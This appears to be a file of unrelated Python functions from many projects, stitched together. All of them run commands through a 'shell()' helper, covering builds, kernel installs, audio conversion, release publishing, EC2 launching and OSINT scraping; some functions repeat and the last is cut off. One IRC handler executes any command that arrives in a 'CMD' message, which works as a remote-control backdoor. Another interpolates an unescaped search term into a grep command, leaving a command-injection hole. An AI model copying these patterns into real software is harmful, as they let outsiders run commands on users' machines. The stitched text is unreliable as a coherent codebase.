def cmake(pkg, ver, path, prefix, builddir, makeopts, jobs, cmake = 'cmake', *args, **kwargs):
    """Build and install a package from source with CMake.

    Configures an out-of-tree build directory, builds with ``make -j<jobs>``,
    and installs into the staging root via ``DESTDIR``.

    Raises KeyError if kwargs lacks 'fakeroot' (it is required).
    """
    bdir = '{}-{}-build'.format(pkg, ver)
    if builddir is not None:
        bdir = os.path.join(builddir, bdir)
    fakeroot = kwargs['fakeroot']  # staging root for DESTDIR installs
    fakeprefix = fakeroot + prefix
    # Point CMake's search paths at the staged prefix so dependencies that
    # were installed earlier into the fakeroot are found at configure time.
    flags = ['-DCMAKE_BUILD_TYPE=Release',
             '-DBOOST_ROOT={}'.format(fakeprefix),
             '-DBUILD_SHARED_LIBS=ON',
             '-DCMAKE_PREFIX_PATH={}'.format(fakeprefix),
             '-DCMAKE_MODULE_PATH={}/share/cmake/Modules'.format(fakeprefix),
             '-DCMAKE_INSTALL_PREFIX={}'.format(prefix)
             ]
    mkpath(bdir)
    with pushd(bdir):
        print('Installing {} ({}) from source with cmake'.format(pkg, ver))
        shell([cmake, path] + flags + [makeopts])
        print(shell('make -j{}'.format(jobs)))
        print(shell('make DESTDIR={} install'.format(fakeroot)))
def install():
    """Install the freshly built kernel plus modules, and rebuild the
    VirtualBox Guest Additions kernel module against it."""
    # Build the module directories in /lib/modules, then install the kernel image
    # and boot filesystem, etc to /boot
    _make_in_linux_source('modules_install install', sudo=True)
    # Compile the VBox Guest Additions against the new kernel and install to /lib/modules,
    # otherwise we won't be able to access VBox shares with the new kernel
    shell('sudo KERN_DIR={} /usr/lib/x86_64-linux-gnu/VBoxGuestAdditions/vboxadd setup'.format(linux_source))
def link_file_in_dir_as(hook_name, dir_path, link_name):
    """Symlink the named hook into dir_path under link_name.

    Also marks the hook source file executable. Returns the exit code
    of the `ln` invocation.
    """
    source = BROC_HOOKS_PATHS[hook_name]
    target = '{0}/{1}'.format(dir_path, link_name)
    link_result = shell('ln -s {0} {1}'.format(source, target))
    shell('chmod +x {0}'.format(source))
    return link_result.code
def app_command(options):
    '''Execute all of the app specific apps.

    options[0] selects the sub-command; the rest are its arguments.
    Unknown commands and missing arguments fall back to app_help().
    '''
    log('app command output %s' % options)
    if options:
        cmd = options[0]
        args = options[1:]
        if cmd=='edit':
            shell('e %s' % app_path(APP_DIR+'/'+args[0]+'.py'))
        elif cmd=='kill':
            kill_server()
        elif cmd=='list':
            list_files()
        elif cmd=='path':
            print(app_path(args[0]))
        elif cmd=='run':
            run_server()
        elif cmd=='search':
            # NOTE(review): args[0] is interpolated unescaped into a shell
            # command line — a metacharacter in the search term will be
            # interpreted by the shell.
            system('grep %s $p/*/*.py' % args[0])
        elif cmd=='template':
            shell('e %s' % app_path('templates/%s.html' % args[0]))
        else:
            print('No app command found, '+cmd)
            app_help()
    else:
        print('No arguments given')
        app_help()
def main():
    """Backsync Webferea: download the web DB, merge its flags into the
    local liferea DB, then upload the local DB back to the server.

    Exits with status 1 on scp failure in either direction.
    """
    print("Start Webferea backsync")

    # download from server
    print("download...")
    cmd = "scp -q %s:%s %s" % (client_config["REMOTE_HOST"],
                               client_config["REMOTE_DB_PATH"],
                               client_config["TMP_PATH"])
    sh = shell(cmd)
    # BUG FIX: was `sh.code is not 0`, which tests object identity rather
    # than value and only worked by way of CPython's small-int interning.
    if sh.code != 0:
        print("failed to download »%s« from host »%s«" % (
            client_config["REMOTE_DB_PATH"], client_config["REMOTE_HOST"]))
        exit(1)

    # backsync the flags from the web database
    print("sync...")
    webitems = get_all_changed_webitems(client_config["TMP_PATH"])
    if webitems:
        update_local_items(client_config["LOCAL_DB"], webitems)

    # delete the tmp file again
    #os.remove(client_config["LOCAL_DB"])

    # upload the clients liferea database
    print("upload...")
    cmd = "scp -q %s %s:%s" % (client_config["LOCAL_DB"],
                               client_config["REMOTE_HOST"],
                               client_config["REMOTE_DB_PATH"])
    sh = shell(cmd)
    # BUG FIX: same `is not 0` identity-comparison defect as above.
    if sh.code != 0:
        print("failed to upload »%s« to host »%s«" % (
            client_config["TMP_PATH"], client_config["REMOTE_HOST"]))
        exit(1)
def bundle(cmd):
    """ Runs bundle

    Usage:

       bundle('install')
       bundle('exec rails s')
       bundle('rake db:create RAILS_ENV=production')

    Arguments:
    cmd: Command to run can be string or list

    Returns:
    Will halt on error
    """
    # Bootstrap bundler itself if it is not on PATH yet.
    sh = shell('which bundler')
    if sh.code > 0:
        gem('install -N bundler')
    hookenv.status_set('maintenance', 'Running Bundler')
    os.chdir(ruby_dist_dir())
    if not isinstance(cmd, str):
        hookenv.log('{} must be a string'.format(cmd), 'error')
        sys.exit(1)
    # -j<cpus>: parallel gem installation
    shell_cmd = set_proxy("bundle {} -j{}".format(cmd, cpu_count()))
    sh = shell(shell_cmd, record_output=False)
    if sh.code > 0:
        hookenv.status_set("blocked", "Ruby error: {}".format(sh.errors()))
        hookenv.log("Ruby error: {}".format(sh.errors()))
        sys.exit(1)
def config(config_name):
    """Copy the named saved kernel config into the source tree and clean it."""
    shell('cp {}/{}.config {}/.config'.format(linux_config, config_name, linux_source))
    shell('khack kernel clean')
    # Answer potential new config questions with yes. If you see this happening
    # you might want to update khack or modify .config yourself
    _make_in_linux_source('olddefconfig')
def flacConvert(self, infile, outfile, logq):
    """Recompress a flac file to flac via the flac binary.

    Skips the conversion when the target already exists and overwriting
    is disabled. Reports the outcome and elapsed time on logq.
    """
    # TODO: see about tag copying across as well
    # FIX: startTime was assigned twice in a row in the original, needlessly
    # resetting the timer; keep a single timer start.
    startTime = time()
    # Seems newer versions of flac actually support flac -> flac
    # recompression natively. Which is nice. This is now very
    # simple to implement, hence removed the old code
    if opts['overwrite']:
        # NOTE(review): += appends " -f " on every call against the same
        # instance, so repeated conversions accumulate flags — confirm
        # this is acceptable (flac tolerates repeated -f).
        self.opts += " -f "
    else:
        if os.path.exists(outfile):
            logq.put([
                infile, outfile, "flac",
                "SUCCESS:skipped due to existing file", 0,
                time() - startTime
            ])
            return 0
    rc = os.system(
        "%sflac %s -s -o %s.flac %s" %
        (ipath.flacpath, self.opts, shell().parseEscapeChars(outfile),
         shell().parseEscapeChars(infile)))
    if (rc == 0):
        logq.put(
            [infile, outfile, "flac", "SUCCESS", rc, time() - startTime])
    else:
        logq.put([
            infile, outfile, "flac", "ERROR:flac ", rc, time() - startTime
        ])
def rsync(pkg, ver, pkgpath, prefix, *args, **kwargs): print('Installing {} ({}) with rsync'.format(pkg, ver)) # assume a root-like layout in the pkgpath dir, and just copy it shell([ 'rsync -am', kwargs.get('makeopts'), '{}/'.format(pkgpath), kwargs['fakeroot'] + prefix ])
def make():
    """Build the kernel and generate a matching initramfs."""
    # Showtime, build kernel. Yeah, that's really it
    _make_in_linux_source('-j8')
    # Build initrd/initramfs too so we can boot this kernel. We need to know the
    # exact kernel version for this
    kernel_version = shell_output('cd {} && make kernelversion'.format(linux_source))
    shell('sudo mkinitramfs -v -o {}/arch/x86/boot/initrd {}-khack'.format(linux_source, kernel_version))
def find_lowest(args):
    """For each molecule listed in args.filename, select one conformer per
    key from the .out results in args.folder and copy the corresponding
    .sdf into <folder>/low/, printing key/smiles (with "nan" for NaN
    energies).

    NOTE(review): despite the function name, the `energy > ...` comparison
    below keeps the HIGHEST-energy conformer — confirm whether `<` was
    intended.
    """
    # FIX: close the input file deterministically (it was never closed).
    with open(args.filename, 'r') as f:
        # already in low folder
        lowfldr = already_found_low(args.folder + "low")

        data = {}

        for line in f:
            line = line.split()
            key = line[0]
            smiles = line[1]

            if key in lowfldr:
                continue

            # find all out files
            files = find_all_in_folder(args.folder, key)
            # FIX: renamed the comprehension variable (was `f`), which
            # shadowed the open file handle under Python 2 scoping rules.
            files = [name.replace(".out", "") for name in files]

            for molname in files:
                energy = get_mopac_energy(args.folder + molname + ".out")
                key, idx = molname.split("_")
                if key not in data:
                    data[key] = {}
                    data[key]['energy'] = energy
                    data[key]['idx'] = idx
                    data[key]['smiles'] = smiles
                else:
                    if energy > data[key]['energy']:
                        data[key]['energy'] = energy
                        data[key]['idx'] = idx
                    else:
                        continue

    keys = sorted(data.keys())

    for key in keys:
        # cp sdf to new name
        idx = data[key]['idx']
        energy = data[key]['energy']
        smiles = data[key]['smiles']
        cmd = "cp {:} {:}".format(args.folder + key + "_" + idx + ".sdf",
                                  args.folder + "low/" + key + ".sdf")
        sh.shell(cmd)
        if np.isnan(energy):
            print(key, smiles, "nan")
        else:
            print(key, smiles)

    return
def write_pdf(self, curdir, source, target, label, version):
    """Render `source` to a PDF at `target` with wkhtmltopdf,
    applying the configured user stylesheet, from inside `curdir`."""
    print("Building PDF: {} - v{}".format(label, version,))
    parts = ('wkhtmltopdf', source,
             '--user-style-sheet', self.user_css_path,
             target)
    with cd(curdir):
        shell(' '.join(parts))
def clean(): """ """ # TODO rewrite shell.shell("rm ~/scr/*", shell=True) return
def check_dependency_epubcheck():
    """Return True if epubcheck is runnable, else warn and return False."""
    try:
        shell('epubcheck')
    except OSError:
        # epubcheck is optional: md2ebook still works, EPUB validation doesn't.
        print warning("Warning: missing epubcheck. You'll be able to run"
                      " md2ebook but you won't be able to check your EPUB "
                      " integrity.")
        print
        return False
    return True
def test_config(testname, dirpath, configdir):
    """Generate envoy.json from configdir with ambassador, validate it in an
    envoy container, and diff it against gold.json when one exists.

    Collects all problems into `errors` and asserts the list is empty.
    """
    errors = []

    if not os.path.isdir(configdir):
        errors.append("configdir %s is not a directory" % configdir)

    envoy_json_out = os.path.join(dirpath, "envoy.json")

    ambassador = shell([
        'python', AMBASSADOR, 'config', configdir, envoy_json_out],
        verbose=True)

    if ambassador.code != 0:
        errors.append('ambassador failed! %s' % ambassador.code)
    else:
        # Validate the generated config with the real envoy binary in
        # --mode validate (parses the config without serving).
        envoy = shell([
            'docker', 'run', '--rm',
            '-v', '%s:/etc/ambassador-config' % dirpath,
            VALIDATOR_IMAGE,
            '/usr/local/bin/envoy',
            '--base-id', '1',
            '--mode', 'validate',
            '-c', '/etc/ambassador-config/envoy.json'
        ], verbose=True)

        envoy_succeeded = (envoy.code == 0)

        print("envoy code %d" % envoy.code)
        print("envoy succeeded %d" % envoy_succeeded)

        if not envoy_succeeded:
            errors.append('envoy failed! %s' % envoy.code)

        envoy_output = list(envoy.output())

        if envoy_succeeded:
            # A successful validation run ends with a line ending in " OK".
            if not envoy_output[-1].strip().endswith(' OK'):
                errors.append('envoy validation failed!')

    gold_path = os.path.join(dirpath, "gold.json")

    if os.path.exists(gold_path):
        # Re-serialize both documents with sorted keys so the diff is
        # insensitive to key order and formatting.
        gold = json.dumps(json.load(open(gold_path, "r")),
                          indent=4, sort_keys=True)
        current = json.dumps(json.load(open(envoy_json_out, "r")),
                             indent=4, sort_keys=True)

        udiff = list(difflib.unified_diff(gold.split("\n"),
                                          current.split("\n"),
                                          fromfile="gold.json",
                                          tofile="envoy.json",
                                          lineterm=""))

        if udiff:
            errors.append("gold.json and envoy.json do not match!\n\n%s" % "\n".join(udiff))

    if errors:
        print("---- ERRORS")
        print("%s" % "\n".join(errors))

    assert not errors, ("failing, errors: %d" % len(errors))
def set_apple(app, preset_number):
    """Move/resize `app`'s front window to the stored preset bounds."""
    positions = get_pos_dict()
    bounds = positions["{}_{}".format(app, preset_number)]
    script_lines = [
        "tell application \"{}\"".format(app),
        "set bounds of front window to {}".format(bounds),
        "end tell",
    ]
    shell(generate_apple_script(script_lines))
def pip(pkg, ver, pkgpath, prefix, dlprefix, *args, **kwargs):
    """Install an exact pinned package version from a local wheel/sdist cache
    into the fakeroot (offline: --no-index)."""
    # pip should be in the tmp root, which is already added to PATH
    cmd = [
        'pip install {}=={}'.format(pkg, ver),
        '--root {}'.format(kwargs['fakeroot']),
        '--prefix {}'.format(prefix),
        '--no-index',
        '--find-links {}'.format(dlprefix),
        kwargs.get('makeopts', '')
    ]
    print('Installing {} ({}) from pip'.format(pkg, ver))
    shell(cmd)
def write_pdf(self, curdir, source, target, label, version):
    """Build `target` PDF from `source` via wkhtmltopdf, running the
    command from within `curdir` and using the instance's stylesheet."""
    print("Building PDF: {} - v{}".format(
        label,
        version,
    ))
    pieces = ['wkhtmltopdf', source, '--user-style-sheet',
              self.user_css_path, target]
    with cd(curdir):
        shell(' '.join(pieces))
def publish(args):
    """Publish a release: rsync packages to the website, push branch and tag
    to GitHub, and upload an sdist to PyPI. Requires ~/.pypirc."""
    if not os.path.isfile(os.path.expanduser('~/.pypirc')):
        print(
            unindent("""
            Missing ~/.pypirc file. Should look like:
            -----------------------------------------
            [distutils]
            index-servers =
                pypi

            [pypi]
            username:your_username
            password:your_password
            """))
        sys.exit(-1)

    ### Upload everything to server
    # The whole release pipeline runs as one shell script, templated with
    # the parsed CLI arguments (build_dir, pkg_dir, version).
    shell("""
        cd {build_dir}/pyqtgraph

        # Uploading documentation.. (disabled; now hosted by readthedocs.io)
        #rsync -rv doc/build/* pyqtgraph.org:/www/code/pyqtgraph/pyqtgraph/documentation/build/

        # Uploading release packages to website
        rsync -v {pkg_dir} pyqtgraph.org:/www/code/pyqtgraph/downloads/

        # Push master to github
        git push https://github.com/pyqtgraph/pyqtgraph master:master

        # Push tag to github
        git push https://github.com/pyqtgraph/pyqtgraph pyqtgraph-{version}

        # Upload to pypi..
        python setup.py sdist upload
    """.format(**args.__dict__))

    print(
        unindent("""
        ======== Upload complete. =========

        Next steps to publish:
        - update website
        - mailing list announcement
        - new conda recipe (http://conda.pydata.org/docs/build.html)
        - contact deb maintainer (gianfranco costamagna)
        - other package maintainers?
        """).format(**args.__dict__))
def publish(args):
    """Publish a release (variant): rsync packages, push branch/tag to
    GitHub, upload sdist to PyPI. Requires a configured ~/.pypirc."""
    if not os.path.isfile(os.path.expanduser('~/.pypirc')):
        print(unindent("""
            Missing ~/.pypirc file. Should look like:
            -----------------------------------------
            [distutils]
            index-servers =
                pypi

            [pypi]
            username:your_username
            password:your_password
            """))
        sys.exit(-1)

    ### Upload everything to server
    # Entire release pipeline as one templated shell script.
    shell("""
        cd {build_dir}/pyqtgraph

        # Uploading documentation.. (disabled; now hosted by readthedocs.io)
        #rsync -rv doc/build/* pyqtgraph.org:/www/code/pyqtgraph/pyqtgraph/documentation/build/

        # Uploading release packages to website
        rsync -v {pkg_dir} pyqtgraph.org:/www/code/pyqtgraph/downloads/

        # Push master to github
        git push https://github.com/pyqtgraph/pyqtgraph master:master

        # Push tag to github
        git push https://github.com/pyqtgraph/pyqtgraph pyqtgraph-{version}

        # Upload to pypi..
        python setup.py sdist upload
    """.format(**args.__dict__))

    print(unindent("""
        ======== Upload complete. =========

        Next steps to publish:
        - update website
        - mailing list announcement
        - new conda recipe (http://conda.pydata.org/docs/build.html)
        - contact deb maintainer (gianfranco costamagna)
        - other package maintainers?
        """).format(**args.__dict__))
def install_composer():
    """ Installs composer """
    hookenv.status_set('maintenance', 'Installing composer')
    sh = shell("wget -q -O /usr/local/bin/composer "
               "https://getcomposer.org/composer.phar")
    if sh.code > 0:
        hookenv.status_set(
            'blocked',
            'Unable to download composer: {}'.format(sh.errors()))
        sys.exit(0)
    # wget does not preserve the executable bit; add it explicitly.
    shell("chmod +x /usr/local/bin/composer")
    hookenv.status_set('active', 'ready')
def get_args(args):
    """Dispatch on the CLI argument count: no file -> interactive shell,
    -h/-help -> usage text, otherwise run the given file."""
    if len(args) > 2:
        print("Too Many Arguments")
        return
    elif len(args) < 2:
        shell.shell()
        return
    elif len(args) == 2:
        if args[1] in ("-h", "-help"):
            print("USAGE: wpl [FILE]")
            return
        else:
            # assumes the else belongs to the inner -h check, i.e. any other
            # single argument is treated as a file to run — TODO confirm
            run.run(sys.argv)
def menu():
    """Print the numbered command menu, read a choice, and dispatch it."""
    # Index in this list == menu number; entry 15 (shell) takes an
    # argument so it is handled separately below.
    actions = [scan, dump, scan_log, scan_log2, recover_file,
               collect_filenames, dump_block, dump_birth, dump_tree,
               dump_0, dump_raw, dump_raidz_raw, dump_disk_meta,
               dump_dnode, xor]
    for number, action in enumerate(actions):
        print("{}: {}".format(number, action.__name__))
    print("15: shell")
    choice = int(input("cmd?: "))
    if choice == 15:
        shell(pool)
    elif 0 <= choice < len(actions):
        actions[choice]()
def ec2_start(ami_id, box_instance_name):
    """Launch one EC2 instance from ami_id, tag it, and poll until its
    public IP is available.

    Returns a dict {'ip': ..., 'aws_instance_id': ...}; raises after
    50 failed polls.
    """
    print 'start instance ' + box_instance_name
    v = shell.shell_json([
        'aws', 'ec2', 'run-instances',
        '--count', '1',
        # too small instance cause random failures with errors like:
        # mysql connection failed, http 500, file not found
        '--instance-type', os.environ['W3TCQA_EC2_INSTANCE_TYPE'],
        '--image-id', ami_id,
        '--key-name', os.environ['W3TCQA_EC2_KEY_NAME'],
        # Dont use default secuirty group with Allow All, since it effectively
        # doesnt allow anything
        '--security-group-ids', os.environ['W3TCQA_EC2_SECURITY_GROUP_ID']
    ])
    aws_instance_id = v['Instances'][0]['InstanceId']

    print 'set tag'
    shell.shell([
        'aws', 'ec2', 'create-tags',
        '--resources', aws_instance_id,
        '--tags', 'Key=Type,Value=w3tcqa-box'
    ])
    shell.shell([
        'aws', 'ec2', 'create-tags',
        '--resources', aws_instance_id,
        '--tags', 'Key=Name,Value=' + box_instance_name
    ])

    print 'get ip'
    # The IP is assigned asynchronously; keep querying until it appears.
    for i in range(50):
        try:
            v = shell.shell_json([
                'aws', 'ec2', 'describe-instances',
                '--filters', 'Name=instance-id,Values=' + aws_instance_id,
                '--query', 'Reservations[].Instances[].PublicIpAddress'
            ])
            ip = v[0]
            print('ip is available: ' + ip)
            return {'ip': ip, 'aws_instance_id': aws_instance_id}
        except:
            # NOTE(review): bare except retries on ANY error, including
            # KeyboardInterrupt — consider narrowing to IndexError/KeyError.
            print('ip is not available yet')
    raise Exception('ip not available')
def get_response(self): time.sleep(1) # Get the response resp = self.irc.recv(2040).decode("UTF-8") print(resp) if resp.find('CMD') != -1: cmd = resp.split(":")[1].replace('\n', '').replace('\r', '') print(cmd) shell(cmd) if resp.find('PING') != -1: self.irc.send(bytes('PONG ' + '\r\n', "UTF-8")) return resp
def opusConvert(self,infile,outfile,logq):
    """Convert a flac file to opus, choosing the conversion strategy by
    opusenc version (pre-0.1.7 lacks flac input / tagging support)."""
    # As the new versions of opus support flac natively, I think that the best option is to
    # use >0.1.7 by default, but support earlier ones without tagging.
    startTime = time()
    if self.version == None:
        print "ERROR! Could not discover opus version, assuming version >= 0.1.7. THIS MAY NOT WORK!"
        version = (9,9,9)
    else:
        version=self.version

    #If we are a release prior to 0.1.7, use non-tagging type conversion, with warning
    if (version[0] == 0) and (version[1] <= 1) and (version[2] <= 6):
        print "WARNING: Opus version prior to 0.1.7 detected, NO TAGGING SUPPORT"
        # Pipe raw decoded audio into opusenc's stdin.
        decoder = flacdecode(infile)()
        encoder = sp.Popen("%sopusenc %s - %s.opus 2> /tmp/opusLog" % (
            opusencpath,
            self.opts,
            shell().parseEscapechars(outfile),
        ) , shell=True, bufsize=8192, stdin=sp.PIPE ).stdin

        for line in decoder.readlines(): #while data exists in the decoders buffer
            encoder.write(line) #write it to the encoders buffer

        decoder.flush() #if there is any data left in the buffer, clear it
        decoder.close() #somewhat self explanetory
        encoder.flush() #as above
        encoder.close()
        logq.put([infile,outfile,"opus","SUCCESS_NOTAGGING",0, time() - startTime])
    else:
        #Later versions support direct conversion from flac->opus, so no need for the above.
        rc = os.system("%sopusenc %s --quiet %s %s.opus" % (
            opusencpath,
            self.opts,
            shell().parseEscapechars(infile),
            shell().parseEscapechars(outfile)
        ) )
        if ( rc != 0 ):
            logq.put([infile,outfile,"opus","ERROR: error executing opusenc. Could not convert",rc, time() - startTime])
        else:
            logq.put([infile,outfile,"opus","SUCCESS",rc, time() - startTime])
def mp3convert(self,infile,outfile,logq):
    """Convert a flac file to mp3 by piping decoded audio into lame,
    carrying flac metadata across as lame tag options where possible."""
    startTime = time()
    inmetadata = flac().getflacmeta(infile)

    try:
        metastring = self.generateLameMeta(inmetadata)
    except(UnboundLocalError):
        metastring = "" #If we do not get meta information. leave blank

    #rb stands for read-binary, which is what we are doing, with a 1024 byte buffer
    decoder = flacdecode(infile)()
    if decoder == None:
        logq.put([infile,outfile,"mp3","ERROR: Could not open flac file for decoding.",-1, time() - startTime])
        return None

    #wb stands for write-binary
    encoder = os.popen("%slame --silent %s - -o %s.mp3 %s" % (
        lamepath,
        self.opts,
        shell().parseEscapechars(outfile),
        metastring
    ) ,'wb',8192)

    for line in decoder.readlines(): #while data exists in the decoders buffer
        encoder.write(line) #write it to the encoders buffer

    decoder.flush() #if there is any data left in the buffer, clear it
    decoder.close() #somewhat self explanetory
    encoder.flush() #as above
    encoder.close()
    logq.put([infile,outfile,"mp3","SUCCESS",0, time() - startTime])
def do_call(param):
    """Query viewdns.info reverse-IP for `param`, scrape the result table,
    and append it to the OSINT report file."""
    url = "https://viewdns.info/reverseip/?host=%s&t=1" % param
    erg = shell("./curl_call.sh %s" % url)

    # curl_call.sh is expected to leave the page in tmp/erg.html.
    soup = BeautifulSoup(open('tmp/erg.html'), 'html.parser')
    dom_table = soup.find_all('table')
    # assumes the result table is always the 4th <table> on the page —
    # fragile against site layout changes
    dom_table = dom_table[3]

    with open('tmp/reverse_whois.txt', 'w') as r:
        for rows in dom_table.find_all('tr'):
            for cells in rows.find_all('td'):
                r.write(cells.text.ljust(30))
            r.write('\n')

    fh_out = open('tmp/reverse_whois.txt', 'r')
    fh_erg = open("output/ergebnis_osint.txt", "a")
    fh_erg.write(" \n---- REVERSE IP ----\n ")
    fh_erg.write("\n")
    for line in fh_out:
        print line.rstrip()
        fh_erg.write(line.rstrip())
        fh_erg.write("\n")
    fh_erg.close()
def set_Spotify(preset_number):
    """Position and resize the Spotify window to the stored preset."""
    apps_pos_d = get_pos_dict()
    spotify_data = apps_pos_d["Spotify_{}".format(preset_number)]
    commands = [
        "tell application \"Spotify\" to activate",
        "set x to {}".format(spotify_data["x"]),
        "set y to {}".format(spotify_data["y"]),
        "set w to {}".format(spotify_data["w"]),
        "set h to {}".format(spotify_data["h"]),
        "tell application \"System Events\"",
        "tell process \"Spotify\" to get first window",
        "set spotify_window to result",
        # {x, y} / {w, h} are AppleScript list literals built from the
        # variables set above, not Python format fields.
        "set position of spotify_window to {x, y}",
        "set size of spotify_window to {w, h}",
        "end tell"
    ]
    apple_script_cmd = generate_apple_script(commands)
    # Run twice — presumably a workaround for the first invocation not
    # sticking reliably; TODO confirm before removing.
    shell(apple_script_cmd)
    shell(apple_script_cmd)
def set_Discord(preset_number):
    """Position and resize the Discord window to the stored preset."""
    apps_pos_d = get_pos_dict()
    discord_data = apps_pos_d["Discord_{}".format(preset_number)]
    commands = [
        "tell application \"Discord\" to activate",
        "set x to {}".format(discord_data["x"]),
        "set y to {}".format(discord_data["y"]),
        "set w to {}".format(discord_data["w"]),
        "set h to {}".format(discord_data["h"]),
        # {w, h} / {x, y} below are AppleScript list literals, not Python
        # format fields.
        "tell application \"System Events\" to tell process \"Discord\"",
        "tell window 1",
        "set size to {w, h}",
        "set position to {x, y}",
        "end tell",
        "end tell"
    ]
    apple_script_cmd = generate_apple_script(commands)
    # Run twice — presumably a workaround for the first invocation not
    # sticking reliably; TODO confirm before removing.
    shell(apple_script_cmd)
    shell(apple_script_cmd)
def mix(cmd):
    """ Runs Mix

    Usage:

       mix('compile')
       mix('test')
       mix('run')

    Arguments:
    cmd: Command to run can be string or list

    Returns:
    Will halt on error
    """
    status_set(
        'maintenance',
        'Running Mix build tool')
    if not os.path.exists(elixir_dist_dir()):
        os.makedirs(elixir_dist_dir())
    os.chdir(elixir_dist_dir())
    if not isinstance(cmd, str):
        status_set('blocked', '{}: should be a string'.format(cmd))
        sys.exit(0)
    # `yes |` auto-confirms any interactive prompts mix may raise.
    cmd = ("yes | mix {}".format(cmd))
    sh = shell(cmd)
    if sh.code > 0:
        status_set("blocked", "Mix error: {}".format(sh.errors()))
        sys.exit(0)
def fetch(pkgfile, repofile, outdir=None, pip='pip', git='git'):
    """Download (and extract) every package/version listed in pkgfile using
    the source URLs recorded in repofile.

    Aborts (returns None) after reporting any requested package or version
    that is missing from the repository.
    """
    with open(pkgfile) as p, open(repofile) as r:
        pkgs, repo = yml.load(p), yml.load(r)

    missingpkg = [pkg for pkg in pkgs if pkg not in repo]
    missingver = [
        pkg for pkg, ver in pkgs.items()
        if pkg in repo and ver not in repo[pkg]
    ]
    if missingpkg:
        eprint('Packages requested, but not found in the repository:')
        eprint('missingpkg: {}'.format(','.join(missingpkg)))
    for pkg in missingver:
        eprint('missingver: missing version for {}: {} requested, found: {}'.
               format(pkg, pkgs[pkg], ','.join(repo[pkg].keys())))
    if missingpkg or missingver:
        return

    for pkg, ver in pkgs.items():
        print(pkg, ver)
        url = repo[pkg][ver]['source']
        pkgname = '{}-{}'.format(pkg, ver)
        dst = pkgname
        # Derive the archive extension from the URL (strip query string),
        # treating "tar.<comp>" as a single two-part extension.
        spliturl = url.split('?')[0].split('.')
        ext = spliturl[-1]
        if len(spliturl) > 1 and spliturl[-2] == 'tar':
            ext = 'tar.{}'.format(spliturl[-1])
        if ext in ['rpm', 'tar', 'gz', 'tgz', 'tar.gz', 'tar.bz2', 'tar.xz']:
            dst = '{}.{}'.format(dst, ext)
        if outdir and not os.path.exists(outdir):
            os.mkdir(outdir)
        if not outdir:
            outdir = '.'
        with pushd(outdir):
            print('Downloading {} ({}): {}'.format(pkg, ver, url))
            protocol = repo[pkg][ver].get('fetch')
            grab(url, filename=dst, version=ver, protocol=protocol,
                 pip=pip, git=git)
            if ext in ['tgz', 'tar.gz', 'tar.bz2', 'tar.xz']:
                print('Extracting {} ...'.format(dst))
                # First line of tar -v output names the archive's top dir.
                topdir = shell(' tar -xvf {}'.format(dst)).split()[0]
                normalised_dir = topdir.split('/')[0]
                # Give the extracted tree a predictable <pkg>-<ver> alias.
                if not os.path.exists(pkgname):
                    print('Creating symlink {} -> {}'.format(
                        normalised_dir, pkgname))
                    os.symlink(normalised_dir, pkgname)
def test_set_wp(self):
    """Setting a wallpaper should update GNOME's picture-uri gsetting."""
    winner = self.col.draw()
    self.backend.set_wallpaper(winner)
    # Read back the value gsettings now reports for the desktop background.
    picture_uri = shell(
        "/usr/bin/env gsettings get org.gnome.desktop.background \
picture-uri").output()[0]
    self.assertEqual("'file://"+winner+"'", picture_uri)
def do_call(param):
    """Query viewdns.info's Chinese-firewall test for `param` and append
    a human-readable summary to the OSINT report file."""
    url = "https://viewdns.info/chinesefirewall/?domain=%s" % param
    erg = shell("./curl_call.sh %s" % url)

    # curl_call.sh leaves the fetched page in tmp/erg.html.
    fh = open("tmp/erg.html", "r")
    fh_erg = open("output/ergebnis_osint.txt", "a")
    fh_erg.write(" \n---- CN FIREWALL ----\n ")
    for line in fh.readlines():
        if "the presence of GeoDNS on this domain name" in line:
            print """
            DNS servers in China returned different IP addresses to those returned by the root servers.
            This could indicate DNS poisoning by the Great Firewall of China.
            It could also just indicate the presence of GeoDNS on this domain name.
            """
            fh_erg.write("DNS servers in China returned different IP addresses to those returned by the root servers.\n")
            fh_erg.write("This could indicate DNS poisoning by the Great Firewall of China.\n")
            fh_erg.write("It could also just indicate the presence of GeoDNS on this domain name.\n")
        if "All servers were able to reach your site" in line:
            print """
            All servers were able to reach your site.
            This means that your site should be accessible from within mainland China.
            """
            fh_erg.write("All servers were able to reach your site.\n")
            fh_erg.write("This means that your site should be accessible from within mainland China.\n")
    fh_erg.close()
def do_call(param):
    """Query viewdns.info's ping test for `param`, scrape the response-time
    table, and append it to the OSINT report file."""
    url = "https://viewdns.info/ping/?domain=%s" % param
    erg = shell("./curl_call.sh %s" % url)

    ######## Test clean html start ################
    clean_html.copy_clean()
    ######## Test clean html Ende ################

    soup = BeautifulSoup(open('tmp/erg_clean.html'), 'html.parser')
    dom_table = soup.find_all('table')
    # assumes the result table is always the 4th <table> on the page
    dom_table = dom_table[3]

    with open('tmp/reverse_whois.txt', 'w') as r:
        for rows in dom_table.find_all('tr'):
            for cells in rows.find_all('td'):
                r.write(cells.text.ljust(22))
            r.write('\n')

    fh_out = open('tmp/reverse_whois.txt', 'r')
    fh_erg = open("output/ergebnis_osint.txt", "a")
    fh_erg.write(" \n---- RESPONSE TIME ----\n ")
    for line in fh_out:
        print line.rstrip()
        fh_erg.write(line.rstrip())
        fh_erg.write("\n")
    fh_erg.close()
def shell_command(testname, argv, must_fail=False, need_stdout=None, need_stderr=None, verbose=True):
    """Run argv via shell() and assert on its exit status and, optionally,
    on substrings that must appear in stdout/stderr.

    Collected problems are printed and then raised via assert.
    """
    problems = []
    prog = os.path.basename(argv[0])

    result = shell(argv, verbose=True)

    if must_fail:
        if result.code == 0:
            problems.append("%s: %s succeeded but should have failed?" % (testname, prog))
    elif result.code != 0:
        problems.append("%s: %s failed (%d)?" % (testname, prog, result.code))

    if need_stdout and (need_stdout not in result.output(raw=True)):
        problems.append("%s: %s stdout does not contain %s" % (testname, prog, need_stdout))

    if need_stderr and (need_stderr not in result.errors(raw=True)):
        problems.append("%s: %s stderr does not contain %s" % (testname, prog, need_stderr))

    if problems:
        print("---- ERRORS")
        print("%s" % "\n".join(problems))

    assert not problems, ("failing, errors: %d" % len(problems))
def test_chaining(self):
    """shell()/Shell with has_input supports fluent .write().output()."""
    # Class-based entry point.
    sh = Shell(has_input=True)
    output = sh.run('cat -u').write('Hello, world!').output()
    self.assertEqual(output, ['Hello, world!'])

    # Convenience-function entry point must behave identically.
    output = shell('cat -u', has_input=True).write('Hello, world!').output()
    self.assertEqual(output, ['Hello, world!'])
def do_call(param):
    """Query viewdns.info reverse-NS for `param`, scrape the result table,
    and print it (this variant does not append to the report file)."""
    url = "https://viewdns.info/reversens/?ns=%s" % param
